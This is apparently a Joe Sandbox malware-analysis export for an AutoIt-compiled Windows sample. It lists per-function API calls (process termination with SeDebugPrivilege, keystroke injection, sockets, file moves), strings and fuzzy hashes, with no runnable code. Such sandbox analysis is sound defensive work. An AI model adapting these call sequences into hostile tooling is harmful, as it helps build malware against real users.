                                                      • Opcode ID: d5d15a552be159f61c1c576f547fc89ca5be01836d9e4db821811584e4614891
                                                      • Instruction ID: 755bc1d026c23d75402b7941ca4ee92a92dac365d2370d96863f3c55b8109173
                                                      • Opcode Fuzzy Hash: d5d15a552be159f61c1c576f547fc89ca5be01836d9e4db821811584e4614891
                                                      • Instruction Fuzzy Hash: 5F318A71600605AFEF219FA5DC84A67BBF8FF58310B14452EF95A82610DB31E814BFE0
                                                      APIs
                                                        • Part of subcall function 00F83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F83A57
                                                        • Part of subcall function 00F83A3D: GetCurrentThreadId.KERNEL32 ref: 00F83A5E
                                                        • Part of subcall function 00F83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F825B3), ref: 00F83A65
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F825BD
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F825DB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F825DF
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F825E9
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F82601
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F82605
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F8260F
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F82623
                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F82627
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: baf8414372323f79f790fa94ec4a46e9327591d580bb0b4704103f0a4a27800f
                                                      • Instruction ID: c2f75f6b613e7c624d78c59c3895aa4adf30277813f89553cc0149e216a5cf66
                                                      • Opcode Fuzzy Hash: baf8414372323f79f790fa94ec4a46e9327591d580bb0b4704103f0a4a27800f
                                                      • Instruction Fuzzy Hash: A201D471390214BBFB107769DCCAF9A3F59DB4EB12F100102F358AE0E1C9F22444AEA9
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F81449,?,?,00000000), ref: 00F8180C
                                                      • HeapAlloc.KERNEL32(00000000,?,00F81449,?,?,00000000), ref: 00F81813
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F81449,?,?,00000000), ref: 00F81828
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00F81449,?,?,00000000), ref: 00F81830
                                                      • DuplicateHandle.KERNEL32(00000000,?,00F81449,?,?,00000000), ref: 00F81833
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F81449,?,?,00000000), ref: 00F81843
                                                      • GetCurrentProcess.KERNEL32(00F81449,00000000,?,00F81449,?,?,00000000), ref: 00F8184B
                                                      • DuplicateHandle.KERNEL32(00000000,?,00F81449,?,?,00000000), ref: 00F8184E
                                                      • CreateThread.KERNEL32(00000000,00000000,00F81874,00000000,00000000,00000000), ref: 00F81868
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 6b8c99c04229e3c07d52a98bb33fbee155af4d09c42a686afecdfe838354ab4c
                                                      • Instruction ID: 45e7114bd2608c5827225d1329246737913b7d2a4e5e6b468471a61cf61c50dd
                                                      • Opcode Fuzzy Hash: 6b8c99c04229e3c07d52a98bb33fbee155af4d09c42a686afecdfe838354ab4c
                                                      • Instruction Fuzzy Hash: F301BFB5240308BFE710AFA5DC8DF573BACEB89B11F404511FA05EB192C6709800DF60
                                                      APIs
                                                        • Part of subcall function 00F8D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00F8D501
                                                        • Part of subcall function 00F8D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00F8D50F
                                                        • Part of subcall function 00F8D4DC: CloseHandle.KERNEL32(00000000), ref: 00F8D5DC
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FAA16D
                                                      • GetLastError.KERNEL32 ref: 00FAA180
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FAA1B3
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FAA268
                                                      • GetLastError.KERNEL32(00000000), ref: 00FAA273
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAA2C4
                                                      Strings
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: 1d3db64876fa77da8fc892fff7c37bca269f124eeac13808c887aab8e52b2705
                                                      • Instruction ID: a09132c275764b9821351af7929c41899ce6c6d4fe295a7b52ecfd02c710da7d
                                                      • Opcode Fuzzy Hash: 1d3db64876fa77da8fc892fff7c37bca269f124eeac13808c887aab8e52b2705
                                                      • Instruction Fuzzy Hash: 65617F71604242AFD720DF14C894F1ABBE5AF45318F14849CE4668FBA3C776EC49DB92
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FB3925
                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FB393A
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FB3954
                                                      • _wcslen.LIBCMT ref: 00FB3999
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FB39C6
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FB39F4
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcslen
                                                      • String ID: SysListView32
                                                      • API String ID: 2147712094-78025650
                                                      • Opcode ID: 34a653c8c79c2f28b7820c62b08fb2efb65e458a8d2d77b0ca3e60fed6f95e82
                                                      • Instruction ID: 437fd0412b4791c5e131ccd30f69569ff6bfc202c38e6e13e4657bf8d0d31d0d
                                                      • Opcode Fuzzy Hash: 34a653c8c79c2f28b7820c62b08fb2efb65e458a8d2d77b0ca3e60fed6f95e82
                                                      • Instruction Fuzzy Hash: 0941B271A40218ABEB219F65CC45FEA7BA9EF08360F100126F958E7281D7B5D980EF90
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F8BCFD
                                                      • IsMenu.USER32(00000000), ref: 00F8BD1D
                                                      • CreatePopupMenu.USER32 ref: 00F8BD53
                                                      • GetMenuItemCount.USER32(012055A8), ref: 00F8BDA4
                                                      • InsertMenuItemW.USER32(012055A8,?,00000001,00000030), ref: 00F8BDCC
                                                      Strings
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                      • String ID: 0$2
                                                      • API String ID: 93392585-3793063076
                                                      • Opcode ID: 524803369a68fad285934faabae98a8be52d8a5f9e4cfc7d1644e67fab4add1e
                                                      • Instruction ID: ebf5db49cad27a97549dcfdda077cc0de8db218175515fc9eedff648e632839e
                                                      • Opcode Fuzzy Hash: 524803369a68fad285934faabae98a8be52d8a5f9e4cfc7d1644e67fab4add1e
                                                      • Instruction Fuzzy Hash: 8451AF72A00209EBDF20EFA8D8C8BEEBBF4AF45324F144219E851D7291D7749945EB61
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00F8C913
                                                      Strings
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: f12378fc7fc0f0c28395068fcbc5a5c47b1c46d829d3b93c4f02e528fcf961e2
                                                      • Instruction ID: 2feac820c8119ddcb21b39f749835c5b6bf7cf396ff3ddc7d52c3b4108027bb6
                                                      • Opcode Fuzzy Hash: f12378fc7fc0f0c28395068fcbc5a5c47b1c46d829d3b93c4f02e528fcf961e2
                                                      • Instruction Fuzzy Hash: 0511EE32A8970ABAA7017B559C82DDB7B9CDF15764B20006BF500E5281EB7CAD4073F5
                                                      APIs
                                                      Similarity
                                                      • API ID: _wcslen$LocalTime
                                                      • String ID:
                                                      • API String ID: 952045576-0
                                                      • Opcode ID: 329dafba768fca8827cd548d63c70f58793aa26515f8d4ee8c23e18081fdff54
                                                      • Instruction ID: e11495c1d3762ed278cee45ae440af9e114dce5a2bae35e7069d14e107ad6a84
                                                      • Opcode Fuzzy Hash: 329dafba768fca8827cd548d63c70f58793aa26515f8d4ee8c23e18081fdff54
                                                      • Instruction Fuzzy Hash: 36418566C1011875CB11FBF48C8AACFBBA8AF45710F508566E914F3121FB78E355E3A6
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F7682C,00000004,00000000,00000000), ref: 00F3F953
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F7682C,00000004,00000000,00000000), ref: 00F7F3D1
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F7682C,00000004,00000000,00000000), ref: 00F7F454
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: c404d9ae1f345ed0b069795f18e71e8848ff42cbb978ed049bfdc34781f5a6ff
                                                      • Instruction ID: 1a6760cce092a92128ace31e50255311d5d80ec2eda07786f5ec0f270d3c70fb
                                                      • Opcode Fuzzy Hash: c404d9ae1f345ed0b069795f18e71e8848ff42cbb978ed049bfdc34781f5a6ff
                                                      • Instruction Fuzzy Hash: 75412931E09640BBC7389B29CCC876B7B92BF56330F14813DE08B56660C672A888FB51
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00FB2D1B
                                                      • GetDC.USER32(00000000), ref: 00FB2D23
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FB2D2E
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FB2D3A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FB2D76
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FB2D87
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FB5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00FB2DC2
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FB2DE1
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 1bae4597dd4ae8c5528974e19327261af84e3ed49cc63cb8b09127e2a580be1a
                                                      • Instruction ID: 55eed22eddcd5baf618ab3c0e3b4c8d2a6efe70f6370befc4d730587950a08ae
                                                      • Opcode Fuzzy Hash: 1bae4597dd4ae8c5528974e19327261af84e3ed49cc63cb8b09127e2a580be1a
                                                      • Instruction Fuzzy Hash: 1E31A972201218BBEB208F14CC8AFEB3BA9EF49721F044155FE089A291C6B58C40DBA0
                                                      APIs
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      APIs
                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F615CE
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F61651
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F617FB,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F616E4
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F616FB
                                                        • Part of subcall function 00F53820: RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F61777
                                                      • __freea.LIBCMT ref: 00F617A2
                                                      • __freea.LIBCMT ref: 00F617AE
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 2829977744-0
                                                      Similarity
                                                      • API ID: Variant$ClearInit
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2610073882-625585964
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00F9125C
                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F91284
                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00F912A8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F912D8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F9135F
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F913C4
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F91430
                                                      Similarity
                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                      • String ID:
                                                      • API String ID: 2550207440-0
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FA396B
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FA3A7A
                                                      • _wcslen.LIBCMT ref: 00FA3A8A
                                                      • VariantClear.OLEAUT32(?), ref: 00FA3C1F
                                                        • Part of subcall function 00F90CDF: VariantInit.OLEAUT32(00000000), ref: 00F90D1F
                                                        • Part of subcall function 00F90CDF: VariantCopy.OLEAUT32(?,?), ref: 00F90D28
                                                        • Part of subcall function 00F90CDF: VariantClear.OLEAUT32(?), ref: 00F90D34
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4137639002-1221869570
                                                      APIs
                                                        • Part of subcall function 00F8000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?,?,00F8035E), ref: 00F8002B
                                                        • Part of subcall function 00F8000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80046
                                                        • Part of subcall function 00F8000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80054
                                                        • Part of subcall function 00F8000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?), ref: 00F80064
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00FA4C51
                                                      • _wcslen.LIBCMT ref: 00FA4D59
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00FA4DCF
                                                      • CoTaskMemFree.OLE32(?), ref: 00FA4DDA
                                                      Similarity
                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 614568839-2785691316
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00FB2183
                                                      • GetMenuItemCount.USER32(00000000), ref: 00FB21B5
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FB21DD
                                                      • _wcslen.LIBCMT ref: 00FB2213
                                                      • GetMenuItemID.USER32(?,?), ref: 00FB224D
                                                      • GetSubMenu.USER32(?,?), ref: 00FB225B
                                                        • Part of subcall function 00F83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F83A57
                                                        • Part of subcall function 00F83A3D: GetCurrentThreadId.KERNEL32 ref: 00F83A5E
                                                        • Part of subcall function 00F83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F825B3), ref: 00F83A65
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FB22E3
                                                        • Part of subcall function 00F8E97B: Sleep.KERNEL32 ref: 00F8E9F3
                                                      Similarity
                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 4196846111-0
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00F8AEF9
                                                      • GetKeyboardState.USER32(?), ref: 00F8AF0E
                                                      • SetKeyboardState.USER32(?), ref: 00F8AF6F
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F8AF9D
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F8AFBC
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F8AFFD
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F8B020
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00F8AD19
                                                      • GetKeyboardState.USER32(?), ref: 00F8AD2E
                                                      • SetKeyboardState.USER32(?), ref: 00F8AD8F
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F8ADBB
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F8ADD8
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F8AE17
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F8AE38
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(00F63CD6,?,?,?,?,?,?,?,?,00F55BA3,?,?,00F63CD6,?,?), ref: 00F55470
                                                      • __fassign.LIBCMT ref: 00F554EB
                                                      • __fassign.LIBCMT ref: 00F55506
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00F63CD6,00000005,00000000,00000000), ref: 00F5552C
                                                      • WriteFile.KERNEL32(?,00F63CD6,00000000,00F55BA3,00000000,?,?,?,?,?,?,?,?,?,00F55BA3,?), ref: 00F5554B
                                                      • WriteFile.KERNEL32(?,?,00000001,00F55BA3,00000000,?,?,?,?,?,?,?,?,?,00F55BA3,?), ref: 00F55584
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 815defb9dfe8ec7b0474f7d28e5347a71f2e871aaff21fb99faaf799c4d79a93
                                                      • Instruction ID: 8a30e905d5de38d5cf74942393ad18b705a285ebb03fa26b5e29bda2750bab9e
                                                      • Opcode Fuzzy Hash: 815defb9dfe8ec7b0474f7d28e5347a71f2e871aaff21fb99faaf799c4d79a93
                                                      • Instruction Fuzzy Hash: 0151F5B1D006099FCB10CFA8DC91AEEBBF9EF08711F18411AFA55E7291E7309A45DB60
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 00F42D4B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F42D53
                                                      • _ValidateLocalCookies.LIBCMT ref: 00F42DE1
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F42E0C
                                                      • _ValidateLocalCookies.LIBCMT ref: 00F42E61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: a8c335a1edc4f21490f4dd89f0b5c992219fa7a09bd5deee5921069ca42d1f71
                                                      • Instruction ID: e3a14560aad25465b9a90ad0420d2ab3adc76b6d4f00873050caa18974a9feb2
                                                      • Opcode Fuzzy Hash: a8c335a1edc4f21490f4dd89f0b5c992219fa7a09bd5deee5921069ca42d1f71
                                                      • Instruction Fuzzy Hash: AD41AB35E00209ABCF10DF68CC85A9EBFB5BF44324F548165FD15AB292DB35AA01EB90
                                                      APIs
                                                        • Part of subcall function 00FA304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FA307A
                                                        • Part of subcall function 00FA304E: _wcslen.LIBCMT ref: 00FA309B
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FA1112
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1121
                                                      • WSAGetLastError.WSOCK32 ref: 00FA11C9
                                                      • closesocket.WSOCK32(00000000), ref: 00FA11F9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 2675159561-0
                                                      • Opcode ID: c19c3c952873216ede1c91be443b10adec0b248140a4853283c1a8f0beb040a9
                                                      • Instruction ID: 8226c10fed5b801eb9e87ada48c38bd34a966333c0f05c9775c6c6c6a73fb96a
                                                      • Opcode Fuzzy Hash: c19c3c952873216ede1c91be443b10adec0b248140a4853283c1a8f0beb040a9
                                                      • Instruction Fuzzy Hash: 67410FB1600218AFDB109F24CC84BAABBE9FF46324F158159F9099F291C774ED41DBE0
                                                      APIs
                                                        • Part of subcall function 00F8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F8CF22,?), ref: 00F8DDFD
                                                        • Part of subcall function 00F8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F8CF22,?), ref: 00F8DE16
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00F8CF45
                                                      • MoveFileW.KERNEL32(?,?), ref: 00F8CF7F
                                                      • _wcslen.LIBCMT ref: 00F8D005
                                                      • _wcslen.LIBCMT ref: 00F8D01B
                                                      • SHFileOperationW.SHELL32(?), ref: 00F8D061
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 3164238972-1173974218
                                                      • Opcode ID: 6afa6ac06454cd31081c1f95103a85a0989f17ad780ced53d60ef94b6bcbcb32
                                                      • Instruction ID: 172abd0dc40ca25d2b4bcf363c13a8e2e0436903ce51d68758392a613b6135e6
                                                      • Opcode Fuzzy Hash: 6afa6ac06454cd31081c1f95103a85a0989f17ad780ced53d60ef94b6bcbcb32
                                                      • Instruction Fuzzy Hash: B5413471D452185FDF12FBA4DD85ADEB7B9AF08380F1000E6E605EB141EB74A644EF60
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FB2E1C
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FB2E4F
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FB2E84
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FB2EB6
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FB2EE0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FB2EF1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FB2F0B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: 124b093b91a7d91774c7b56aae30b1b2b7362bb465a2582d541e3b518610cd75
                                                      • Instruction ID: f54136e87330ea5cc7d2375e25559f416a83060e7f28fb1b8ba283450dbbeb54
                                                      • Opcode Fuzzy Hash: 124b093b91a7d91774c7b56aae30b1b2b7362bb465a2582d541e3b518610cd75
                                                      • Instruction Fuzzy Hash: 9B31F231A04258AFEB618F5ADC84FA537E5FB9A720F150164F9048B2B1CBB1E840EF91
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F87769
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F8778F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00F87792
                                                      • SysAllocString.OLEAUT32(?), ref: 00F877B0
                                                      • SysFreeString.OLEAUT32(?), ref: 00F877B9
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00F877DE
                                                      • SysAllocString.OLEAUT32(?), ref: 00F877EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 5f7df3d8a2ac67dc13ac47b0c98f458184ddf5f722aad0d317daff39ca84d334
                                                      • Instruction ID: f480d4157834e9da784ecb3a5c0461356b73c50e6ad738049c4bba7c99c607ea
                                                      • Opcode Fuzzy Hash: 5f7df3d8a2ac67dc13ac47b0c98f458184ddf5f722aad0d317daff39ca84d334
                                                      • Instruction Fuzzy Hash: 2F21A176A04219AFDB10FFA8CC88EFF73ACEB09764B148125B904DB150D670DD41EBA0
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F87842
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F87868
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00F8786B
                                                      • SysAllocString.OLEAUT32 ref: 00F8788C
                                                      • SysFreeString.OLEAUT32 ref: 00F87895
